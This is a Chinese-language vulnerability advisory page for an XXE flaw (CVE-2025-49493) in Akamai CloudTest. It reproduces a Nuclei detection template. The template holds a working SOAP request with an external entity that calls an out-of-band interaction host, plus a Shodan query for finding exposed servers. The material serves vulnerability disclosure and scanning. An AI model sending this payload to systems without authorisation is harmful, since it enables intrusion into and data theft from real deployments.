CVE-2025-49493: Akamai CloudTest < 60 2025.06.02 - XML External Entity (XXE)

日期: 2025-08-01 | 影响软件: Akamai CloudTest | POC: 已公开

漏洞描述

Akamai CloudTest before 60 2025.06.02 (12988) allows file inclusion via XML External Entity (XXE) injection.

PoC代码[已公开]

id: CVE-2025-49493

info:
  name: Akamai CloudTest < 60 2025.06.02 - XML External Entity (XXE)
  author: xbow,3th1c_yuk1
  severity: critical
  description: |
    Akamai CloudTest before 60 2025.06.02 (12988) allows file inclusion via XML External Entity (XXE) injection.
  reference:
    - https://xbow.com/blog/xbow-akamai-cloudtest-xxe/
    - https://techdocs.akamai.com/cloudtest/changelog/june-2-2025-enhancements-and-bug-fixes
    - https://nvd.nist.gov/vuln/detail/CVE-2025-49493
  classification:
    epss-score: 0.01101
    epss-percentile: 0.77279
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
    cvss-score: 9.1
    cve-id: CVE-2025-49493
    cwe-id: CWE-611
    cpe: cpe:2.3:a:akamai:cloudtest:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"Akamai CloudTest"
    vendor: akamai
    product: cloudtest
  tags: cve,cve2025,akamai,cloudtest,xxe,oast,rce,vkev

http:
  - raw:
      - |
        POST /concerto/services/RepositoryService HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/html
        SOAPAction: ""

        <?xml version="1.0" encoding="UTF-8"?>
        <!DOCTYPE soapenv:Envelope [
          <!ENTITY xxe SYSTEM "http://{{interactsh-url}}">
        ]>
        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
                          xmlns:rep="http://example.com/services/repository">
           <soapenv:Header/>
           <soapenv:Body>
              <rep:getUIBundleObjectXml>
                 <rep:uiBundleRequestXml>&xxe;</rep:uiBundleRequestXml>
              </rep:getUIBundleObjectXml>
           </soapenv:Body>
        </soapenv:Envelope>

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
          - 'contains(content_type, "text/xml")'
          - 'contains(body, "XML stream")'
        condition: and
# digest: 4a0a0047304502210095838f0ce5d8dbdd625c26b1e13ba90501d742c6645e6c5776c3654f2a46619102204bd4c3a2c3c4b8400e32e227865724b4d54e5d2363c6ccc4142f326bf8870081:922c64590222798bb761d5b6d8e72950

相关漏洞推荐